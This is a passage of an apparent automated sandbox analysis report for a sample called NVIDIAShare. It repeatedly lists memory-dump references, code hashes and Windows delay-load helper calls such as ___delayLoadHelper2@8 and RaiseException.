                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d2fdd046b25d0b4e345de736f29691f8323015c77e7d611ef9f2a746823cbdcf
                                                            • Instruction ID: 85aace7adcc5d1cebee061f8371faa6f66f5062e2ab578477d2d35a386104e12
                                                            • Opcode Fuzzy Hash: d2fdd046b25d0b4e345de736f29691f8323015c77e7d611ef9f2a746823cbdcf
                                                            • Instruction Fuzzy Hash: 8CB012E125C0117C30055105DF05C7F020CD6C4920320C01FFDCCD8044D8441C0E0873
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e25f19bae1487f1f5352d15acb960f9bc2db343457490e94d94937918796a5f4
                                                            • Instruction ID: cd9593717e7ebf2ed828371590bfbdec4d96b695d378a8e419a60867f8becb98
                                                            • Opcode Fuzzy Hash: e25f19bae1487f1f5352d15acb960f9bc2db343457490e94d94937918796a5f4
                                                            • Instruction Fuzzy Hash: 80B012F165C011FC30059105DD05C3F024CD6C4E10320C01FFCCCD8044D8485D090473
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: cfd9ef1385eed80298058fc83dd0cd72251969832cd92666d8e1b37c4175de2b
                                                            • Instruction ID: 350f8d76f511b809350aa210e6c52221da445448b0e8651335ffd5f874c07634
                                                            • Opcode Fuzzy Hash: cfd9ef1385eed80298058fc83dd0cd72251969832cd92666d8e1b37c4175de2b
                                                            • Instruction Fuzzy Hash: 5BB012E165C011BC30059105DE05C3F020CD6C4920320C01FFCCCD8044D8445C090873
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 87e732825f2394e1ed79d66e9fc1b51656e10546ee8bfd1afa14549787987ae7
                                                            • Instruction ID: 6c37eeca4ba4309e90b94170aad58ba3533d9d5d0c9c81a65c5370fd31139fd4
                                                            • Opcode Fuzzy Hash: 87e732825f2394e1ed79d66e9fc1b51656e10546ee8bfd1afa14549787987ae7
                                                            • Instruction Fuzzy Hash: 71A001E66A91627D710A6652AE0AC7F121DCAD5A25320952EFCA9E8488AC8828461873
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e892327258928e5e2adf73823c05c4b1db1ce94f789cbca47699410d95870433
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: e892327258928e5e2adf73823c05c4b1db1ce94f789cbca47699410d95870433
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 51be4cfe6e200d441e2578d64901c947a372e21c6dd3c4612882c5a1e0a7b637
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: 51be4cfe6e200d441e2578d64901c947a372e21c6dd3c4612882c5a1e0a7b637
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 83caaa049db07c3f01617ef2dacdd8d2c7746ee5735d2cf6fb280cc8b18ae367
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: 83caaa049db07c3f01617ef2dacdd8d2c7746ee5735d2cf6fb280cc8b18ae367
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0a2e4bf9a724199ef004c39e9be412b0bd46616a09eb17419bf2f12cdc86c1fa
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: 0a2e4bf9a724199ef004c39e9be412b0bd46616a09eb17419bf2f12cdc86c1fa
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0ac36788fb6949bae5b7582efb04957f4dd97b44810dfb4be52e2cd2da2c207b
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: 0ac36788fb6949bae5b7582efb04957f4dd97b44810dfb4be52e2cd2da2c207b
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 44fb098375c0c5ba334f77bbd8a0a03b44304a7d0c22e9a2c20088e55b20671b
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: 44fb098375c0c5ba334f77bbd8a0a03b44304a7d0c22e9a2c20088e55b20671b
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 0fd600838f9711b585ba1f0e32883f8e723eff053ffe7d04b50367a7a8136ec2
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: 0fd600838f9711b585ba1f0e32883f8e723eff053ffe7d04b50367a7a8136ec2
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 1eb2c4c79e9c3e2c0c3dac93f0bf829b20b41de8a1a41f41e9a7b005441857e1
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: 1eb2c4c79e9c3e2c0c3dac93f0bf829b20b41de8a1a41f41e9a7b005441857e1
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 45c6e2d182267d78bdf7af9f86a15fb3a99585c7fc514e732f3d3f6d89855fe8
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: 45c6e2d182267d78bdf7af9f86a15fb3a99585c7fc514e732f3d3f6d89855fe8
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 872f735582d6b4ed508a1fa0931d0746c347efddaaea331264870ef32d5358a0
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: 872f735582d6b4ed508a1fa0931d0746c347efddaaea331264870ef32d5358a0
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 041501e421993cbd24492b5ba323471598ffec1963f7d3cb79ab16f3d780a845
                                                            • Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
                                                            • Opcode Fuzzy Hash: 041501e421993cbd24492b5ba323471598ffec1963f7d3cb79ab16f3d780a845
                                                            • Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0101E51F
                                                              • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                              • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
